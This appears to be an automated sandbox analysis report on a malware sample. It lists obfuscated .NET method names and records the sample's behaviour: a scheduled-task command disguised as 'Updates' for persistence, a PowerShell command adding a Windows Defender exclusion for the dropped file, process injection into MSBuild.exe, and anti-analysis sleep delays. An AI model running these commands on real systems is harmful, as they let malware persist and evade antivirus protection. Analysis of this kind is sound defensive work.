              Source: 0.2.file.exe.7da0000.5.raw.unpack, ilyiiFeo9pEQDT6PeR.cs | High entropy of concatenated method names: 'oZks3AlmCh', 'Rjksk5d6Qh', 'JWQsV4OUHE', 'bw9smrVk5u', 'FNAsiXsyyP', 'uwwsfF1jdN', 'Uuvs0HofqK', 'mP8sjIeSHA', 'SNAs56uO3H', 'CjlsoRUgiF'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, wsToelauAL4QSYIHRl.cs | High entropy of concatenated method names: 'rl4p1bIZi', 'VVN4LJgF9', 'c321M6roi', 'JjeEKwxKn', 'aLSOuDB4G', 'jEUrMN7Qp', 'VR7deDj3HpdnaQMDSL', 'TLjRAmMOGtBXPTjpq8', 'EEcDwBGmQ', 'gdcBC9bdI'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, ejF1favvTDacTwdwLoy.cs | High entropy of concatenated method names: 'hdMBoKdd1j', 'n9qBzkof0O', 'huecurBK5d', 'ASTcvtEpH8', 'gBncaixFNS', 'BLucJWZneg', 'yO7c7gs9r5', 'hDPcQghw0Q', 'ahGcG3yvV0', 'yYUcsLn2RR'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, nrTMXVzus5p3wVwY83.cs | High entropy of concatenated method names: 'iZWB1WOjD1', 'dttBerPcxu', 'tiMBOIRGqO', 'aoLB8PHZGi', 'KD1BdlTofb', 'uldBWX7Zry', 'u5eBKFVk5V', 'drTBNRvvR6', 'aLmBThmqr3', 'PYHBAH3yu6'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, Ov9AGc7SIaCE1ftaPC.cs | High entropy of concatenated method names: 'z3CvFlyiiF', 'Y9pv2EQDT6', 'gEqvgepEsg', 'vK3vhNXOQ9', 'pxSvyQ5TDB', 'LPJvLZAA2V', 'U3nLx0TUPafp9sXpA0', 'hbQrROrfrd01VRs3Pj', 'Uv2vvjy9q9', 'HLGvJug2BJ'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, NOQ9uxrnD6fd9LxSQ5.csHigh entropy of concatenated method names: 'vPOxlMLpNp', 'odpxE8vQ9n', 'JmwPZKLh45', 'XbPPWjVR9w', 'a2DPKP3IVF', 'asYPYXRuDQ', 'so6Pnvp1Sc', 'gnQP6iP2yL', 'jm7P97d5sP', 'PpyPXs2VRq'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, DYSqfG57jlfxJj6XDl.csHigh entropy of concatenated method names: 'ENwM81D6Rj', 'J9uMdYqwvX', 'dLWMZ7JKNb', 'X1pMWl6Mhp', 'wCOMKehgAA', 'oM5MYKUw5x', 'wCNMnoVwPS', 'GCKM6BNFRm', 'VhoM9xUJqO', 'a4HMXg1CV7'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, A4sPow0AQmW0L4yTTd.csHigh entropy of concatenated method names: 'chvMyZBGZO', 'fVnMU0yfuT', 'eqPMMcn2Oy', 'g4DMckFgSS', 'lG1MRF1bQc', 'ATxMNEinch', 'Dispose', 'll5DGkj54t', 'FnODsBhhqR', 'YT7DP2CaYr'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, TwuCJPVNKQBdk2rjXt.csHigh entropy of concatenated method names: 'ToString', 'zi0LIC1l0u', 'epcLdIQs6N', 'A6VLZKyDns', 'gkOLWEOKgU', 'BKjLKRg2eX', 'ox6LYmoJh2', 'NWkLnSteon', 'Ti5L61DGti', 'PHdL9j4vdX'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, T5YTX1WQkmmqWAJ8l4.csHigh entropy of concatenated method names: 'Yt4CNdLV5a', 'LylCT3Ml5U', 'JEXCpCEYyZ', 'l93C4xBRgY', 'D6iC1cHxJ4', 'c9pCELIKhQ', 'drFCO8wq3H', 'eY6CrtmpNM', 'AlRZP7X3PSXjjsbcKb9', 'WuCVElXe0qMx7nHrhu2'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, nONc9n3HVcDQ9CoFUl.csHigh entropy of concatenated method names: 'DwSyX5IHdC', 'E9qytN1qHP', 'wL8y3hFfeK', 'kPmykbLlwA', 'DmEydMpUit', 'gBlyZCLVXJ', 'N9tyWFOmDO', 's2jyKJraH3', 'q7HyYF73U8', 'n2PynnQgmu'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, quwUQi90ioWypYE7oF.csHigh entropy of concatenated method names: 'qDoFTfXm7T', 'PWxFAp9sJ8', 'fssFpcwNk9', 'JA3F4hhd5c', 'hApFlf38qp', 'PvMF1O8CDI', 'z77FEctfvJ', 'V93Fe54M6S', 'xc0FOhN891', 'gByFr5nkmP'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, J1hgTPOEqepEsgRK3N.csHigh entropy of concatenated method names: 'WJpP4jqG63', 'PlkP1cQorm', 'wGYPeo8hR5', 'hSbPOc4ZNX', 'u7PPyJwhsE', 'QpQPLKp18b', 'GptPUCrm5D', 'JGvPD6KBET', 'UxUPMfgBJr', 'fL8PBu2RDd'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, S05RV5fOjYvyiPaZTY.csHigh entropy of concatenated method names: 'IXXUjt6UF5', 'YcOUo9eGAC', 'h0qDuFU5DV', 'afEDv8uYA0', 'DRKUIBpJpP', 'h6bUtMJcZf', 'L06UbDy8xt', 'mcrU3IuqLD', 'YTuUkjmbZs', 'tN5UV5ataS'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, I1tqhMsitN66Pt9vOL.csHigh entropy of concatenated method names: 'Dispose', 'TW0v5L4yTT', 'Vftad1hEr6', 'z8Ujmv4Q0c', 'G6MvoWJZSY', 'opWvzHKdJt', 'ProcessDialogKey', 'YveauYSqfG', 'djlavfxJj6', 'NDlaa69xFA'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, pPBPfxvJqfrSovQWaVx.csHigh entropy of concatenated method names: 'lfccokR6Ln', 'AcKczE3wn1', 'JmhSuH4up9', 'SUmt53hE53WSdqZAZ4b', 'B6Yud51bqcSuUKx3Ek6', 'BmTOQ51zrOVFOAroM8o', 'ijATOjhDhfpJlFnytyw', 'H92O1OhXITdcCp18io2'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, L9xFARoPmTUYlrdcmh.csHigh entropy of concatenated method names: 'lQMBPFiKy6', 'VegBxMpp7B', 'MDvBCnuMVE', 'vA2BFbn8qt', 'vGcBMbDo1I', 'a7xB2HyjBi', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, BxloEJ2ukLoPetmOQZ.csHigh entropy of concatenated method names: 'ITEJQ2W8g6', 'QpBJGTCTkU', 'SdpJs2Iipt', 'dU0JPX8PXj', 'CgXJxQYDT8', 'NV2JCJU866', 'palJFytWfj', 'hI0J2dixcn', 'rdWJwrbfPW', 'qYAJgWiMsk'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, xDB6PJ8ZAA2Vc38ho2.csHigh entropy of concatenated method names: 'T1nCQVBpIX', 'xAcCsFBGNV', 'uKfCxasdDp', 'yx1CFhQNyd', 'HdnC2yopUl', 'jR9xiXUNEq', 'hdmxfBSuSe', 'sInx016fRH', 'dTBxjvyOTs', 'Kpkx5GcuDj'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, gn7PDCv78mC8RSHZAsG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QlsSM8qyMT', 'Y6TSBk4EGL', 'cU5ScgruVM', 'mNtSSoAZfG', 'OvnSR8Rfk5', 'Ac0SHTr99l', 'YnRSNsUuQP'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, iklBj6nh8xKEL1t5aN.csHigh entropy of concatenated method names: 'XF4FGi93Ph', 'A3DFPGNs5F', 'LSLFCp83RN', 'lhyCovT9YJ', 'RLsCzm4UBO', 'sq7FuY7viB', 'aGYFv8bcQb', 'hpqFa3LrUq', 'qd9FJEx8SJ', 'RoXF78w44f'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, maF3W0bye86jqflJPh.csHigh entropy of concatenated method names: 'nPDqeC14Ip', 'sg0qO3cpKq', 'zdNq84oNv1', 'gadqd5ec62', 'bONqWL5Tyu', 'fqMqKt6k1Z', 't0hqnfgqcx', 'ynJq6yqIrl', 'JlfqX2nsEQ', 'iNlqIqwx3h'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, ilyiiFeo9pEQDT6PeR.csHigh entropy of concatenated method names: 'oZks3AlmCh', 'Rjksk5d6Qh', 'JWQsV4OUHE', 'bw9smrVk5u', 'FNAsiXsyyP', 'uwwsfF1jdN', 'Uuvs0HofqK', 'mP8sjIeSHA', 'SNAs56uO3H', 'CjlsoRUgiF'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, wsToelauAL4QSYIHRl.csHigh entropy of concatenated method names: 'rl4p1bIZi', 'VVN4LJgF9', 'c321M6roi', 'JjeEKwxKn', 'aLSOuDB4G', 'jEUrMN7Qp', 'VR7deDj3HpdnaQMDSL', 'TLjRAmMOGtBXPTjpq8', 'EEcDwBGmQ', 'gdcBC9bdI'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, ejF1favvTDacTwdwLoy.csHigh entropy of concatenated method names: 'hdMBoKdd1j', 'n9qBzkof0O', 'huecurBK5d', 'ASTcvtEpH8', 'gBncaixFNS', 'BLucJWZneg', 'yO7c7gs9r5', 'hDPcQghw0Q', 'ahGcG3yvV0', 'yYUcsLn2RR'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, nrTMXVzus5p3wVwY83.csHigh entropy of concatenated method names: 'iZWB1WOjD1', 'dttBerPcxu', 'tiMBOIRGqO', 'aoLB8PHZGi', 'KD1BdlTofb', 'uldBWX7Zry', 'u5eBKFVk5V', 'drTBNRvvR6', 'aLmBThmqr3', 'PYHBAH3yu6'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, Ov9AGc7SIaCE1ftaPC.csHigh entropy of concatenated method names: 'z3CvFlyiiF', 'Y9pv2EQDT6', 'gEqvgepEsg', 'vK3vhNXOQ9', 'pxSvyQ5TDB', 'LPJvLZAA2V', 'U3nLx0TUPafp9sXpA0', 'hbQrROrfrd01VRs3Pj', 'Uv2vvjy9q9', 'HLGvJug2BJ'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, NOQ9uxrnD6fd9LxSQ5.csHigh entropy of concatenated method names: 'vPOxlMLpNp', 'odpxE8vQ9n', 'JmwPZKLh45', 'XbPPWjVR9w', 'a2DPKP3IVF', 'asYPYXRuDQ', 'so6Pnvp1Sc', 'gnQP6iP2yL', 'jm7P97d5sP', 'PpyPXs2VRq'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, DYSqfG57jlfxJj6XDl.csHigh entropy of concatenated method names: 'ENwM81D6Rj', 'J9uMdYqwvX', 'dLWMZ7JKNb', 'X1pMWl6Mhp', 'wCOMKehgAA', 'oM5MYKUw5x', 'wCNMnoVwPS', 'GCKM6BNFRm', 'VhoM9xUJqO', 'a4HMXg1CV7'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, A4sPow0AQmW0L4yTTd.csHigh entropy of concatenated method names: 'chvMyZBGZO', 'fVnMU0yfuT', 'eqPMMcn2Oy', 'g4DMckFgSS', 'lG1MRF1bQc', 'ATxMNEinch', 'Dispose', 'll5DGkj54t', 'FnODsBhhqR', 'YT7DP2CaYr'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, TwuCJPVNKQBdk2rjXt.csHigh entropy of concatenated method names: 'ToString', 'zi0LIC1l0u', 'epcLdIQs6N', 'A6VLZKyDns', 'gkOLWEOKgU', 'BKjLKRg2eX', 'ox6LYmoJh2', 'NWkLnSteon', 'Ti5L61DGti', 'PHdL9j4vdX'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, T5YTX1WQkmmqWAJ8l4.csHigh entropy of concatenated method names: 'Yt4CNdLV5a', 'LylCT3Ml5U', 'JEXCpCEYyZ', 'l93C4xBRgY', 'D6iC1cHxJ4', 'c9pCELIKhQ', 'drFCO8wq3H', 'eY6CrtmpNM', 'AlRZP7X3PSXjjsbcKb9', 'WuCVElXe0qMx7nHrhu2'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, nONc9n3HVcDQ9CoFUl.csHigh entropy of concatenated method names: 'DwSyX5IHdC', 'E9qytN1qHP', 'wL8y3hFfeK', 'kPmykbLlwA', 'DmEydMpUit', 'gBlyZCLVXJ', 'N9tyWFOmDO', 's2jyKJraH3', 'q7HyYF73U8', 'n2PynnQgmu'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, quwUQi90ioWypYE7oF.csHigh entropy of concatenated method names: 'qDoFTfXm7T', 'PWxFAp9sJ8', 'fssFpcwNk9', 'JA3F4hhd5c', 'hApFlf38qp', 'PvMF1O8CDI', 'z77FEctfvJ', 'V93Fe54M6S', 'xc0FOhN891', 'gByFr5nkmP'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, J1hgTPOEqepEsgRK3N.csHigh entropy of concatenated method names: 'WJpP4jqG63', 'PlkP1cQorm', 'wGYPeo8hR5', 'hSbPOc4ZNX', 'u7PPyJwhsE', 'QpQPLKp18b', 'GptPUCrm5D', 'JGvPD6KBET', 'UxUPMfgBJr', 'fL8PBu2RDd'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, S05RV5fOjYvyiPaZTY.csHigh entropy of concatenated method names: 'IXXUjt6UF5', 'YcOUo9eGAC', 'h0qDuFU5DV', 'afEDv8uYA0', 'DRKUIBpJpP', 'h6bUtMJcZf', 'L06UbDy8xt', 'mcrU3IuqLD', 'YTuUkjmbZs', 'tN5UV5ataS'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00406128 ShellExecuteW,URLDownloadToFileW,12_2_00406128
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe

              Boot Survival

Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BC4

              Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Yara match File source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: DcBNSgyxoJFip.exe PID: 4864, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_0040E54F Sleep,ExitProcess, 12_2_0040E54F
              Source: C:\Users\user\Desktop\file.exe Memory allocated: 13C0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\file.exe Memory allocated: 2EC0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\file.exe Memory allocated: 2D30000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\file.exe Memory allocated: 9130000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\file.exe Memory allocated: A130000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\file.exe Memory allocated: A340000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\file.exe Memory allocated: B340000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\file.exe Memory allocated: BAD0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\file.exe Memory allocated: CAD0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\file.exe Memory allocated: DAD0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Memory allocated: 15B0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Memory allocated: 2F00000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Memory allocated: 2D50000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Memory allocated: 8C70000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Memory allocated: 9C70000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Memory allocated: 9E60000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Memory allocated: AE60000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Memory allocated: B600000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Memory allocated: C600000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Memory allocated: D600000 memory reserve | memory write watch
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 12_2_004198C2
              Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6347
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3462
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 672
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 9276
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API coverage: 5.1 %
              Source: C:\Users\user\Desktop\file.exe TID: 3884 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5396 Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1592 Thread sleep count: 672 > 30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1592 Thread sleep time: -2016000s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1592 Thread sleep count: 9276 > 30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1592 Thread sleep time: -27828000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe TID: 1088 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 12_2_0040B335
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 12_2_0041B42F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 12_2_0040B53A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_0044D5E9 FindFirstFileExA, 12_2_0044D5E9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 12_2_004089A9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00406AC2 FindFirstFileW,FindNextFileW, 12_2_00406AC2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 12_2_00407A8C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW, 12_2_00418C69
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 12_2_00408DA7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 12_2_00406F06
              Source: MSBuild.exe, 00000007.00000002.4586156440.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_0043A65D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 12_2_0041BCE3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00442554 mov eax, dword ptr fs:[00000030h] 12_2_00442554
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_0044E92E GetProcessHeap, 12_2_0044E92E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00434168
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00433B44
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00433CD7 SetUnhandledExceptionFilter, 12_2_00433CD7
              Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe"
              Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
              Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
              Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 457000
              Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 470000
              Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 476000
              Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47B000
              Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9D3008
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 457000
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 470000
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 476000
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47B000
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 10A5008
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 12_2_00410F36
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00418754 mouse_event, 12_2_00418754
              Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp"
              Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp2A05.tmp"
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
